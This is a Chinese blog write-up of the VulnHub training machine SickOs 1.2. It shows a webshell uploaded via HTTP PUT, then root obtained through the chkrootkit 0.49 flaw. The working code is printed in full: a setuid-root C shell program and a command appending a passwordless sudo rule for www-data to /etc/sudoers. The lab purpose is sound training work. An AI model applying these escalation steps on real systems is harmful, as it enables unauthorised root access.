vulnhub-SickOs1.2

已于 2024-09-03 08:45:03 修改
阅读量259 收藏 6
点赞数 3
分类专栏: 渗透之路-打靶-vulnhub系列 文章标签: 网络安全
于 2024-09-02 19:51:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62146983/article/details/141824224
版权

vulnhub-SickOs1.2

攻击机:kali(111.111.111.129),windows(192.168.1.3)

靶机地址:111.111.111.140

信息收集:

使用nmap:端口扫描,服务发现
在这里插入图片描述
使用dirmap:目录扫描
在这里插入图片描述
发现一个test目录,里面可以访问文件。
在这里插入图片描述

漏洞利用

使用burp抓包,测试支持的传输协议,发现可以上传文件
在这里插入图片描述
使用PUT协议上传一个木马
在这里插入图片描述
使用天蝎连接
在这里插入图片描述

权限提升

在天蝎上进行提权操作,当前为web-data
在这里插入图片描述

提权姿势1

chkrootkit提权
chkrootkit是一个后门木马检查工具,Chkrootkit0.49以及以下版本均存在本地提权漏洞,只要提权上传一个文件到tmp目录,管理员再次运行Chkrootkit后,即可获取root权限。
使用kali搜索该漏洞,发现可以使用msf进行操作,也可以在本地操作。
在这里插入图片描述
既然已经拿到webshell,获取meterpeter也是很简单的,这里不详细说明。
直接上手
在这里插入图片描述
在这里插入图片描述

再复现一下本地的,创建c语言脚本

#include <unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}

将 /tmp/update 文件的所有者和所属组都更改为 root。这意味着 /tmp/update 文件将由 root 用户和 root 组所有。
chmod 4755 /tmpupdate,这样可以设置文件的权限。4755 是一个八进制的文件权限掩码,设置后,文件将具有以下权限:

4 (Setuid):如果此文件是一个可执行文件,那么用户执行此文件时,将获得文件所有者的权限。
7 (rwx) 对应所有者:读、写、执行权限。
5 (r-x) 对应组和其他用户:读和执行权限。
这将允许任何用户执行 /tmpupdate 文件时以 root 权限运行。

编译在这里插入图片描述
到tmp目录执行./update可以直接获取root权
在这里插入图片描述

提权姿势二

写入sudo权限提权

将www-data用户写入到管理员组sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

给update赋权

chmod +x /tmp/update

查看权限执行sudo
sudo su ----成功获得root权限

本文参考https://www.freebuf.com/vuls/354371.html

Luther@ping
关注
专栏目录
(Vulnhub练习)---SICKOS: 1.2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-03 2014
文章目录(Vulnhub练习)-- SICKOS: 1.2渗透实战下载地址主机发现目标ip192.168.100.159信息收集nmap端口扫描指纹识别路径扫描漏洞挖掘PUT方法任意写文件漏洞使用nmap脚本进行扫描漏洞利用php一句话木马 + 蚁剑连接nc反弹shellmsf反弹shellmsf改为php反弹shell本地提权查看靶机的版本及内核信息查看/etc/cron*下所含的所有文件查看chkrootkit的版本搜索chkrootkit 0.49版本漏洞查看提权步骤提权步骤:将当前用户(www-da
vulnhubSickOs1.2 靶机
Nicky_Zheng的博客
01-29 586
1、 信息收集 1.1、主机发现 使用netdiscover扫描靶机ip kali@kali:~$ sudo netdiscover -i eth1 6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360 _____________________________________________________________________________ IP At M
13-VulnHub-SickOs 1.2
尼德霍格007
08-04 281
vulnhub-SickOs 1.2 靶机地址:https://www.vulnhub.com/entry/sickos-12,144/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-4 一、信息收集 nmap扫描靶机ip地址 nmap -sP 192.168.21.0/24 nmap扫描靶机开放的端口 nmap -A -p 1-64000 192.168.21.149 可以看到靶机只开放了22和80端口,访问一下web页面 看了一下页面源码,没啥
vulnhub SickOs: 1.2
箭雨镜屋
01-14 2751
渗透思路: nmap扫描---->dirb扫描---->通过PUT方法上传php反弹shell---->利用chkrootkit漏洞提权
Vulnhub-SickOs:1.2
cr7lyl的博客
09-11 1019
记一次Vulnhub-SickOs1.2渗透过程
Vulnhub靶机:SickOs1.2
qq_48904485的博客
03-21 840
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:SickOs 1.2(10.0.2.15)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
vulnhub靶场-sickos1.2
zzzzzzkeai的博客
12-08 299
vulnhub靶场--sickos1.2靶场
vulnhub】---SickOS1.2靶机
qq_43168364的博客
08-22 459
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:靶机(192.168.15.) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 命令:arp-scan -l 端口扫描 命令:masscan --rate=10000 --ports 0-65535 19
vulnhub靶场渗透之SickOs1.2渗透教程(超级详细)
旺仔Sec&blog
05-30 2275
靶机下载链接作者D4rk发布日期2016年4月27日难度中等这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限1、这个靶场主要考察的是支持http协议,PUT方法等2、然后就是使用多种反弹shell的方法,不过就是这里设置了规则反弹shell的端口3、最后就是靶机的提权,多多浏览靶机内的可疑文件,结合exp库来实现最终提权的目的。
Vulnhub靶机 SickOs1.2
菜浪马废的博客
04-25 244
没啥有用的东西 只有一个test 可以用put方式 试了好几个端口4444 1180 1234都不行 换了443可以了 成功提权 就用了一种方法 这有个大佬,写的超级详细 传送门 ...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root...
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7314
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8539
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Windows系统远程桌面设置(附win11家庭版开启组策略功能及远程桌面)
11-10
Windows系统远程桌面设置(附win11家庭版开启组策略功能及远程桌面)
一个兼容vue 2.x-3.x 的vue-seamless-scroll区域滚动插件
11-10
一个兼容vue 2.x-3.x 的vue-seamless-scroll区域滚动插件
名人堂网页源代码压缩包
11-10
我的目标是打造一个平台,让人们能够轻松地探索和学习那些对世界产生深远影响的杰出人物。
【信号检测】基于matlab自适应滤波法微弱信号检测【Matlab仿真 2308期】.zip
11-10
【信号检测】基于matlab自适应滤波法微弱信号检测【Matlab仿真 2308期】.zip
CAD2024案例文件.zip
最新发布
11-10
CAD2024案例文件.zip
NetworkManager-adsl-1.18.4-3.el7.x86_64.rpm
11-10
Centos7 el7.x86_64 官方离线安装包,安装指令为 sudo rpm -ivh NetworkManager-adsl-1.18.4-3.el7.x86_64.rpm
vulnhub靶机系列:
09-09
3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luther@ping

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值